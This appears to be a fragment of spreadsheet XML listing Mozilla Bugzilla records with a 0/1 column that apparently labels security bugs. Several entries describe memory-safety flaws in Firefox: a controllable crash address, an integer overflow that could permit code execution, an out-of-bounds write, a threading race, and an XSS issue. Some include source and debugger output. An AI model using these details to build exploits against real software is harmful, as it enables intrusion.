          <t>FIXED</t>
        </is>
      </c>
      <c r="P4973" t="inlineStr"/>
      <c r="Q4973" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4973" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4973" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4973" t="n">
        <v>1</v>
      </c>
      <c r="U4973" t="n">
        <v>0</v>
      </c>
      <c r="V4973" t="n">
        <v>34</v>
      </c>
      <c r="W4973" t="inlineStr">
        <is>
          <t>The only files left in the /about dir on the old mozilla.org SVN repo are in the /about/forums dir.
We need to determine which files are still relevant, and where they should be ported.
The files are:
http://www.mozilla.org/about/forums/index.html
http://www.mozilla.org/about/forums/etiquette.html
http://www.mozilla.org/about/forums/cancellation.html
There are also three Perl scripts that live the /about/forums dir (checklist, commit, and gen-ng-info). These seem to be scripts that grab the list of forums from news.mozilla.org, dump them to a text file, and generates the list for the /about/forums page.
The etiquette.html and cancellation.html pages seem like they could live under http://mozilla.org/about/governance/policies/ but it might also make sense for them to stay with the overview page (index.html) where ever it ends up.
So, Forums page (http://www.mozilla.org/about/forums/). Should it be ported to Bedrock as is? Does it belong elsewhere?</t>
        </is>
      </c>
      <c r="X4973" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4974">
      <c r="A4974" t="n">
        <v>1739923</v>
      </c>
      <c r="B4974" t="inlineStr">
        <is>
          <t>2021-11-07 16:10:43 -0800</t>
        </is>
      </c>
      <c r="C4974" t="inlineStr">
        <is>
          <t>SEGV on unknown address 0x14141414 in nsTextFragment::CharAt</t>
        </is>
      </c>
      <c r="D4974" t="inlineStr">
        <is>
          <t>2024-05-30 10:50:34 -0700</t>
        </is>
      </c>
      <c r="E4974" t="n">
        <v>1</v>
      </c>
      <c r="F4974" t="n">
        <v>1</v>
      </c>
      <c r="G4974" t="n">
        <v>3</v>
      </c>
      <c r="H4974" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4974" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4974" t="inlineStr">
        <is>
          <t>DOM: Editor</t>
        </is>
      </c>
      <c r="K4974" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4974" t="inlineStr">
        <is>
          <t>Desktop</t>
        </is>
      </c>
      <c r="M4974" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4974" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4974" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4974" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form][Landed in 1740847][sec-survey][post-critsmash-triage][adv-main96+][adv-ESR91.5+]</t>
        </is>
      </c>
      <c r="Q4974" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4974" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S4974" t="inlineStr">
        <is>
          <t>96 Branch</t>
        </is>
      </c>
      <c r="T4974" t="n">
        <v>1</v>
      </c>
      <c r="U4974" t="n">
        <v>0</v>
      </c>
      <c r="V4974" t="n">
        <v>19</v>
      </c>
      <c r="W4974" t="inlineStr">
        <is>
          <t>Created attachment 9249657
testcase.html
From the testcase after the `insertParagraph` executed, Firefox will crash with AV on 0x14141414 (32-bit) or 0x000014141414 (64-bit), the crash address is controllable through `insertAdjacentText` new line or space character length, on the testcase I'm using decimal `336860180`  which converted to hex `0x14141414`.
When execute `insertAdjacentText` to fill DOM with a lot of space character, the memory will increase, currently one new line or space character is equivalent to one SEGV address increase, it will be more interesting if there are workaround to optimize the memory to hit higher SEGV address.</t>
        </is>
      </c>
      <c r="X4974" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4975">
      <c r="A4975" t="n">
        <v>1059081</v>
      </c>
      <c r="B4975" t="inlineStr">
        <is>
          <t>2014-08-26 22:29:13 -0700</t>
        </is>
      </c>
      <c r="C4975" t="inlineStr">
        <is>
          <t>TCPSocket crash in nsMultiplexInputStream::ReadSegments on "Socket Thread" due to apparent racey use of nsMultiplexInputStream</t>
        </is>
      </c>
      <c r="D4975" t="inlineStr">
        <is>
          <t>2017-03-15 16:00:35 -0700</t>
        </is>
      </c>
      <c r="E4975" t="n">
        <v>1</v>
      </c>
      <c r="F4975" t="n">
        <v>1</v>
      </c>
      <c r="G4975" t="n">
        <v>3</v>
      </c>
      <c r="H4975" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4975" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4975" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K4975" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4975" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4975" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4975" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4975" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4975" t="inlineStr">
        <is>
          <t>[adv-main39+][b2g-adv-main2.2+]</t>
        </is>
      </c>
      <c r="Q4975" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4975" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4975" t="inlineStr">
        <is>
          <t>mozilla41</t>
        </is>
      </c>
      <c r="T4975" t="n">
        <v>1</v>
      </c>
      <c r="U4975" t="n">
        <v>1</v>
      </c>
      <c r="V4975" t="n">
        <v>45</v>
      </c>
      <c r="W4975" t="inlineStr">
        <is>
          <t>The Gaia email app uses TCPSocket in our back-end tests using b2g-desktop in a non-OOP mode.  I have observed intermittent crashes in nsMultiplexInputStream::ReadSegments.  I'm not exactly clear what's going on, but the fact that TCPSocket.js calls removeStream(0) and appendStream(...) on the main thread while nsMultiplexInputStream::ReadSegments is doing something on the "Socket Thread" without any apparent synchronization constructs seems like it could explain things.
The call stack on an -O1 self-built trunk build from earlier today looks like this:
#0  nsMultiplexInputStream::ReadSegments (this=0x2aaaca7bb740, aWriter=&lt;optimized out&gt;, aClosure=&lt;optimized out&gt;, aCount=65536, aResult=0x2aaabeaffbcc)
318	    rv = mStreams[mCurrentStream]-&gt;ReadSegments(ReadSegCb, &amp;state, aCount, &amp;read);
#1  0x00002aaaac9dae65 in nsStreamCopierIB::DoCopy (this=&lt;optimized out&gt;, aSourceCondition=0x2aaabeaffc08, aSinkCondition=0x2aaabeaffc0c) at xpcom/io/nsMultiplexInputStream.cpp:318
#2  0x00002aaaac9db093 in Process (this=0x2aaad01f0500) at xpcom/io/nsStreamUtils.cpp:291
#3  nsAStreamCopier::Run (this=0x2aaad01f0500) at xpcom/io/nsStreamUtils.cpp:414
#4  0x00002aaaac9e7588 in nsThread::ProcessNextEvent (this=0x2aaabe8263c0, aMayWait=&lt;optimized out&gt;, aResult=0x2aaabeaffcef)
#5  0x00002aaaaca053ee in NS_ProcessNextEvent (aThread=&lt;optimized out&gt;, aMayWait=&lt;optimized out&gt;)
#6  0x00002aaaaca37c3e in nsSocketTransportService::Run (this=0x2aaaabd8f600) at netwerk/base/src/nsSocketTransportService2.cpp:744
#7  0x00002aaaac9e7588 in nsThread::ProcessNextEvent (this=0x2aaabe8263c0, aMayWait=&lt;optimized out&gt;, aResult=0x2aaabeaffdcf)
#8  0x00002aaaaca053ee in NS_ProcessNextEvent (aThread=&lt;optimized out&gt;, aMayWait=&lt;optimized out&gt;)
#9  0x00002aaaacc56927 in mozilla::ipc::MessagePumpForNonMainThreads::Run (this=0x2aaabe82d040, aDelegate=0x2aaaabd67060)
#10 0x00002aaaacc3532a in MessageLoop::RunInternal (this=this@entry=0x2aaaabd67060)
#11 0x00002aaaacc35598 in RunHandler (this=0x2aaaabd67060)
#12 MessageLoop::Run (this=this@entry=0x2aaaabd67060)
#13 0x00002aaaac9ebee3 in nsThread::ThreadFunc (aArg=0x2aaabe8263c0)
#14 0x00002aaaabfd2fb8 in _pt_root (arg=0x2aaaabd37920)
#15 0x00002aaaaacd8182 in start_thread (arg=0x2aaabeb00700)
#16 0x00002aaaab7f738d in clone ()
(gdb) p *mStreams.mHdr
$20 = {
  static sEmptyHdr = {
    static sEmptyHdr = &lt;same as static member of an already seen type&gt;, 
    mLength = 0, 
    mCapacity = 0, 
    mIsAutoArray = 0
  }, 
  mLength = 2, 
  mCapacity = 3, 
  mIsAutoArray = 0
}
(gdb) x/4g mStreams.mHdr
0x2aaad0f0ee20:	0x0000000300000002	0x00002aaac153a400
0x2aaad0f0ee30:	0x00002aaac153a4c0	0x5a5a5a5a5a5a5a5a
(gdb) p mCurrentStream
$21 = 1
Unfortunately, Elements() seems to have been optimized out 
The disassembly around the crash point start from the while loop comparator is:
   0x00002aaaac9ccc58 &lt;+102&gt;:	cmp    %r12d,%edx
   0x00002aaaac9ccc5b &lt;+105&gt;:	jae    0x2aaaac9ccce6 &lt;nsMultiplexInputStream::ReadSegments(tag_nsresult (*)(nsIInputStream*, void*, char const*, unsigned int, unsigned int, unsigned int*), void*, unsigned int, unsigned int*)+244&gt;
   0x00002aaaac9ccc61 &lt;+111&gt;:	jmp    0x2aaaac9cccd5 &lt;nsMultiplexInputStream::ReadSegments(tag_nsresult (*)(nsIInputStream*, void*, char const*, unsigned int, unsigned int, unsigned int*), void*, unsigned int, unsigned int*)+227&gt;
   0x00002aaaac9ccc63 &lt;+113&gt;:	lea    0x1c(%rsp),%r15
   0x00002aaaac9ccc68 &lt;+118&gt;:	lea    0x20(%rsp),%r14
   0x00002aaaac9ccc6d &lt;+123&gt;:	lea    -0x3e4(%rip),%r13        # 0x2aaaac9cc890 &lt;nsMultiplexInputStream::ReadSegCb(nsIInputStream*, void*, char const*, unsigned int, unsigned int, unsigned int*)&gt;
   0x00002aaaac9ccc74 &lt;+130&gt;:	mov    %edx,%edx
// get mStreams
   0x00002aaaac9ccc76 &lt;+132&gt;:	mov    0x28(%rbx),%rax
// get mStreams.mHdr.element[1] (not literally, but)
   0x00002aaaac9ccc7a &lt;+136&gt;:	mov    0x8(%rax,%rdx,8),%rdi 
=&gt; 0x00002aaaac9ccc7f &lt;+141&gt;:	mov    (%rdi),%rax
   0x00002aaaac9ccc82 &lt;+144&gt;:	mov    %r15,%r8
   0x00002aaaac9ccc85 &lt;+147&gt;:	mov    %ebp,%ecx
   0x00002aaaac9ccc87 &lt;+149&gt;:	mov    %r14,%rdx
   0x00002aaaac9ccc8a &lt;+152&gt;:	mov    %r13,%rsi
   0x00002aaaac9ccc8d &lt;+155&gt;:	callq  *0x30(%rax)
(gdb) info registers rax rbx rdx rdi
rax            0x2aaaca642500	46913028367616
rbx            0x2aaaca7bb740	46913029912384
rdx            0x1	1
rdi            0x100000001	4294967297
// just confirming offsets here
(gdb) p this
$27 = (nsMultiplexInputStream * const) 0x2aaaca7bb740
(gdb) p &amp;mStreams
$26 = (nsTArray&lt;nsCOMPtr&lt;nsIInputStream&gt; &gt; *) 0x2aaaca7bb768
(gdb) x 0x100000001
0x100000001:	Cannot access memory at address 0x100000001
I'm guessing that subscripting the nsTArray raced a main-thread call to appendStream and this resulted in a corrupt/crazy value.  Although 0x100000001 is a pretty bad-ass pointer.
I think this is probably concerning for B2G in both non-OOP and OOP since based on the remoting currently in use, all the same risky business would happen in the parent process.  I'm not marking this a security bug, though, since TCPSocket is a privileged-only API within the circle of trust, if you will.
cc'ing other affected email people, leaving this up to Core::Network people for assessment/etc.</t>
        </is>
      </c>
      <c r="X4975" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4976">
      <c r="A4976" t="n">
        <v>433328</v>
      </c>
      <c r="B4976" t="inlineStr">
        <is>
          <t>2008-05-12 07:31:59 -0700</t>
        </is>
      </c>
      <c r="C4976" t="inlineStr">
        <is>
          <t>XSS using &lt;script&gt; element in unloaded document</t>
        </is>
      </c>
      <c r="D4976" t="inlineStr">
        <is>
          <t>2008-07-23 08:38:32 -0700</t>
        </is>
      </c>
      <c r="E4976" t="n">
        <v>1</v>
      </c>
      <c r="F4976" t="n">
        <v>1</v>
      </c>
      <c r="G4976" t="n">
        <v>3</v>
      </c>
      <c r="H4976" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4976" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4976" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K4976" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4976" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4976" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N4976" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4976" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4976" t="inlineStr">
        <is>
          <t>[sg:high xss]</t>
        </is>
      </c>
      <c r="Q4976" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4976" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4976" t="inlineStr">
        <is>
          <t>mozilla1.9</t>
        </is>
      </c>
      <c r="T4976" t="n">
        <v>1</v>
      </c>
      <c r="U4976" t="n">
        <v>0</v>
      </c>
      <c r="V4976" t="n">
        <v>23</v>
      </c>
      <c r="W4976" t="inlineStr">
        <is>
          <t>This is probably the same bug as bug 433003.  And, this seems to be a problem
with nsDocument::GetScriptGlobalObject like bug 428672.
A &lt;script&gt; element in an old document can be evaluated in a new document.  The
script itself is evaluated with the old document's principal, but, it's
possible to create a function that can run with the new document's principal.</t>
        </is>
      </c>
      <c r="X4976" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4977">
      <c r="A4977" t="n">
        <v>1154876</v>
      </c>
      <c r="B4977" t="inlineStr">
        <is>
          <t>2015-04-15 13:05:02 -0700</t>
        </is>
      </c>
      <c r="C4977" t="inlineStr">
        <is>
          <t>Flash calls PPluginModuleChild::SendSetCursor() off the main thread</t>
        </is>
      </c>
      <c r="D4977" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E4977" t="n">
        <v>1</v>
      </c>
      <c r="F4977" t="n">
        <v>1</v>
      </c>
      <c r="G4977" t="n">
        <v>6</v>
      </c>
      <c r="H4977" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4977" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J4977" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K4977" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4977" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4977" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4977" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4977" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4977" t="inlineStr">
        <is>
          <t>[adv-main39+][adv-esr38.1+][adv-esr31.8+]</t>
        </is>
      </c>
      <c r="Q4977" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4977" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4977" t="inlineStr">
        <is>
          <t>mozilla41</t>
        </is>
      </c>
      <c r="T4977" t="n">
        <v>1</v>
      </c>
      <c r="U4977" t="n">
        <v>0</v>
      </c>
      <c r="V4977" t="n">
        <v>57</v>
      </c>
      <c r="W4977" t="inlineStr">
        <is>
          <t>I came across this signature on crash-stats:
  https://crash-stats.mozilla.com/report/index/67b8450e-48d8-4b67-9fcc-dabd02150414#allthreads
It looks like the Flash player is trying to send a message, but it hits an IPC thread assertion that Bill added recently.</t>
        </is>
      </c>
      <c r="X4977" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4978">
      <c r="A4978" t="n">
        <v>1172055</v>
      </c>
      <c r="B4978" t="inlineStr">
        <is>
          <t>2015-06-05 10:58:16 -0700</t>
        </is>
      </c>
      <c r="C4978" t="inlineStr">
        <is>
          <t>Overflow in nsAttrAndChildArray::GrowBy causes memory-safety bug</t>
        </is>
      </c>
      <c r="D4978" t="inlineStr">
        <is>
          <t>2024-05-30 09:02:02 -0700</t>
        </is>
      </c>
      <c r="E4978" t="n">
        <v>1</v>
      </c>
      <c r="F4978" t="n">
        <v>1</v>
      </c>
      <c r="G4978" t="n">
        <v>3</v>
      </c>
      <c r="H4978" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4978" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4978" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K4978" t="inlineStr">
        <is>
          <t>42 Branch</t>
        </is>
      </c>
      <c r="L4978" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4978" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4978" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4978" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4978" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main41+][adv-esr38.3+]</t>
        </is>
      </c>
      <c r="Q4978" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4978" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4978" t="inlineStr">
        <is>
          <t>mozilla42</t>
        </is>
      </c>
      <c r="T4978" t="n">
        <v>0</v>
      </c>
      <c r="U4978" t="n">
        <v>0</v>
      </c>
      <c r="V4978" t="n">
        <v>20</v>
      </c>
      <c r="W4978" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 5.1; rv:36.0) Gecko/20100101 Firefox/36.0
Build ID: 20150305021524
Steps to reproduce:
nsAttrAndChildArray::GrowBy (38.0.1\dom\base\nsAttrAndChildArray.cpp) can overflow if mBufferSize becomes very large, causing a realloc to a tiny buffer size. Other code in the class subsequently writes to unallocated space, potentially permitting the execution of attacker-chosen code, as by modifying an object's virtual-function table:
763: bool
764: nsAttrAndChildArray::GrowBy(uint32_t aGrowSize)
765: {
766:   uint32_t size = mImpl ? mImpl-&gt;mBufferSize + NS_IMPL_EXTRA_SIZE : 0;
767:   uint32_t minSize = size + aGrowSize;
768: 
769:   if (minSize &lt;= ATTRCHILD_ARRAY_LINEAR_THRESHOLD) {
770:     do {
771:       size += ATTRCHILD_ARRAY_GROWSIZE;
772:     } while (size &lt; minSize);
773:   }
774:   else {
775:     size = 1u &lt;&lt; mozilla::CeilingLog2(minSize);
776:   }
777: 
778:   bool needToInitialize = !mImpl;
779:   Impl* newImpl = static_cast&lt;Impl*&gt;(moz_realloc(mImpl, size * sizeof(void*)));
780:   ...
If size (from mImpl-&gt;mBufferSize) is very close to 0xffffffff, line 767 can overflow. If the condition on line 769 is satisfied, size also can overflow. If the condition on line 767 is not satisfied, line 775 computes a tiny size from minSize. In either case, line 779 allocates a buffer far too small to contain all the existing data, and other code in the class writes to the unallocated area.</t>
        </is>
      </c>
      <c r="X4978" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4979">
      <c r="A4979" t="n">
        <v>1804564</v>
      </c>
      <c r="B4979" t="inlineStr">
        <is>
          <t>2022-12-07 15:42:40 -0800</t>
        </is>
      </c>
      <c r="C4979" t="inlineStr">
        <is>
          <t>Write beyond bounds in EncodeInputStream()</t>
        </is>
      </c>
      <c r="D4979" t="inlineStr">
        <is>
          <t>2024-05-30 11:02:58 -0700</t>
        </is>
      </c>
      <c r="E4979" t="n">
        <v>1</v>
      </c>
      <c r="F4979" t="n">
        <v>1</v>
      </c>
      <c r="G4979" t="n">
        <v>3</v>
      </c>
      <c r="H4979" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4979" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4979" t="inlineStr">
        <is>
          <t>XPCOM</t>
        </is>
      </c>
      <c r="K4979" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4979" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4979" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4979" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4979" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4979" t="inlineStr">
        <is>
          <t>[adv-main110+][adv-esr102.8+]</t>
        </is>
      </c>
      <c r="Q4979" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4979" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S4979" t="inlineStr">
        <is>
          <t>111 Branch</t>
        </is>
      </c>
      <c r="T4979" t="n">
        <v>1</v>
      </c>
      <c r="U4979" t="n">
        <v>0</v>
      </c>
      <c r="V4979" t="n">
        <v>23</v>
      </c>
      <c r="W4979" t="inlineStr">
        <is>
          <t>`EncodeInputStream()` (xpcom/io/base64.cpp) repeatedly reads from the specified stream and encodes into `aDest` until the stream is exhausted. However, the function uses the requested input data length `aCount` or the (then-current) stream length `count64` returned by `aInputStream-&gt;Available()` to calculate how much memory to allocate for the output buffer `aDest` (line 209, below). If `aInputStream` can return additional data beyond the specified input data length --  which is permissible for `nsIInputStream` objects -- `EncodeInputStream()` will write beyond bounds:
      186: template &lt;typename T&gt;
      187: nsresult EncodeInputStream(nsIInputStream* aInputStream, T&amp; aDest,
      188:                            uint32_t aCount, uint32_t aOffset) {
      189:   nsresult rv;
      190:   uint64_t count64 = aCount;
      191: 
      192:   if (!aCount) {
      193:     rv = aInputStream-&gt;Available(&amp;count64);
      194:     if (NS_WARN_IF(NS_FAILED(rv))) {
      195:       return rv;
      196:     }
      197:     // if count64 is over 4GB, it will be failed at the below condition,
      198:     // then will return NS_ERROR_OUT_OF_MEMORY
      199:     aCount = (uint32_t)count64;
      200:   }
      201: 
      202:   const auto base64LenOrErr = CalculateBase64EncodedLength(count64, aOffset);
      203:   if (base64LenOrErr.isErr()) {
      204:     // XXX For some reason, it was NS_ERROR_OUT_OF_MEMORY here instead of
      205:     // NS_ERROR_FAILURE, so we keep that.
      206:     return NS_ERROR_OUT_OF_MEMORY;
      207:   }
      208: 
      209:   if (!aDest.SetLength(base64LenOrErr.inspect(), mozilla::fallible)) {
      210:     return NS_ERROR_OUT_OF_MEMORY;
      211:   }
      212: 
      213:   EncodeInputStream_State&lt;T&gt; state;
      214:   state.charsOnStack = 0;
      215:   state.c[2] = '\0';
      216:   state.buffer = aOffset + aDest.BeginWriting();
      217: 
      218:   while (true) {
      219:     uint32_t read = 0;
      220: 
      221:     rv = aInputStream-&gt;ReadSegments(&amp;EncodeInputStream_Encoder&lt;T&gt;,
      222:                                     (void*)&amp;state, aCount, &amp;read);
      223:     if (NS_FAILED(rv)) {
      224:       if (rv == NS_BASE_STREAM_WOULD_BLOCK) {
      225:         MOZ_CRASH("Not implemented for async streams!");
      226:       }
      227:       if (rv == NS_ERROR_NOT_IMPLEMENTED) {
      228:         MOZ_CRASH("Requires a stream that implements ReadSegments!");
      229:       }
      230:       return rv;
      231:     }
      232: 
      233:     if (!read) {
      234:       break;
      235:     }
      236:   }
      ...
      249:   return NS_OK;
      250: 
      251: }
(code from trunk)
The bug is that the `while` loop beginning line 218 doesn't adjust `aCount` to account for the input it has processed. This means that the 2nd and succeeding iterations of the loop use the original value, thus emptying the stream of its entire contents, even if that exceeds `aCount` bytes.
It is unclear whether this bug can be manifested. `EncodeInputStream()` is called only by `Base64EncodeInputStream()` (same module), which is called only via three paths. The first two probably do not allow the bug to be manifested, but the third might:
   1. `ReadAsDataURL()` (FileReaderSync.cpp), which first converts the stream into an `nsStringInputStream` by calling `ConvertAsyncToSyncStream()`, so the stream is a fixed size, so the bug cannot be invoked on this path.
   2. `HTMLCanvasElement::ToDataURLImpl()`, which appears to create a fixed-size stream representing canvas element contents. The stream isa `imgIEncoder`, which isa `nsIAsyncInputStream`. However, all code paths initialize the stream using its `InitFromData()` method, which synchronously fills the stream. So, the bug cannot be invoked on this path.
   3. `nsScriptableBase64Encoder::EncodeTo[C]String()` (xpcom/io/nsScriptableBase64Encoder.cpp), which is called only via the interface returned when using `ModuleID::Anonymous404` (`CreateInstanceImpl()` in xpcom/components/StaticComponents.cpp). This interface appears to be available to privileged code by using the "@mozilla.org/scriptablebase64encoder;1" interface name (StaticComponents.cpp)</t>
        </is>
      </c>
      <c r="X4979" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4980">
      <c r="A4980" t="n">
        <v>1085511</v>
      </c>
      <c r="B4980" t="inlineStr">
        <is>
          <t>2014-10-20 11:24:40 -0700</t>
        </is>
      </c>
      <c r="C4980" t="inlineStr">
        <is>
          <t>gecko build: Port B2G Desktop Linux x64 Debug</t>
        </is>
      </c>
      <c r="D4980" t="inlineStr">
        <is>
          <t>2015-07-14 03:10:54 -0700</t>
        </is>
      </c>
      <c r="E4980" t="n">
        <v>1</v>
      </c>
      <c r="F4980" t="n">
        <v>1</v>
      </c>
      <c r="G4980" t="n">
        <v>5</v>
      </c>
      <c r="H4980" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4980" t="inlineStr">
        <is>
          <t>Taskcluster</t>
        </is>
      </c>
      <c r="J4980" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4980" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4980" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4980" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4980" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4980" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4980" t="inlineStr"/>
      <c r="Q4980" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4980" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4980" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4980" t="n">
        <v>1</v>
      </c>
      <c r="U4980" t="n">
        <v>0</v>
      </c>
      <c r="V4980" t="n">
        <v>6</v>
      </c>
      <c r="W4980" t="inlineStr">
        <is>
          <t>We have an existing builder image but it should be using the in tree mozconfig 
https://mxr.mozilla.org/mozilla-central/source/b2g/config/mozconfigs/linux64_gecko/debug
Should only be a matter of copying the current task and setting the new mozconfig</t>
        </is>
      </c>
      <c r="X4980" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4981">
      <c r="A4981" t="n">
        <v>1633142</v>
      </c>
      <c r="B4981" t="inlineStr">
        <is>
          <t>2020-04-25 04:41:40 -0700</t>
        </is>
      </c>
      <c r="C4981" t="inlineStr">
        <is>
          <t>build busted 2020-04-25: Variable DEFINES is defined in /builds/worker/checkouts/gecko/comm/calendar/base/backend/libical/build/Makefile.in. It should only be defined in moz.build files.</t>
        </is>
      </c>
      <c r="D4981" t="inlineStr">
        <is>
          <t>2020-04-26 18:47:40 -0700</t>
        </is>
      </c>
      <c r="E4981" t="n">
        <v>1</v>
      </c>
      <c r="F4981" t="n">
        <v>1</v>
      </c>
      <c r="G4981" t="n">
        <v>2</v>
      </c>
      <c r="H4981" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4981" t="inlineStr">
        <is>
          <t>Calendar</t>
        </is>
      </c>
      <c r="J4981" t="inlineStr">
        <is>
          <t>Build Config</t>
        </is>
      </c>
      <c r="K4981" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4981" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4981" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4981" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4981" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4981" t="inlineStr"/>
      <c r="Q4981" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4981" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S4981" t="inlineStr">
        <is>
          <t>Thunderbird 77.0</t>
        </is>
      </c>
      <c r="T4981" t="n">
        <v>1</v>
      </c>
      <c r="U4981" t="n">
        <v>0</v>
      </c>
      <c r="V4981" t="n">
        <v>6</v>
      </c>
      <c r="W4981" t="inlineStr">
        <is>
          <t>Builds are busted (double so). This is for the errors of
Variable DEFINES is defined in /builds/worker/checkouts/gecko/comm/calendar/base/backend/libical/build/Makefile.in. It should only be defined in moz.build files.
Don't know from which bug this is fallout. One from https://hg.mozilla.org/mozilla-central/pushloghtml?changeset=d8a8178627c4fab05f1eb46ee40f55db207c7c18</t>
        </is>
      </c>
      <c r="X4981" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4982">
      <c r="A4982" t="n">
        <v>1180790</v>
      </c>
      <c r="B4982" t="inlineStr">
        <is>
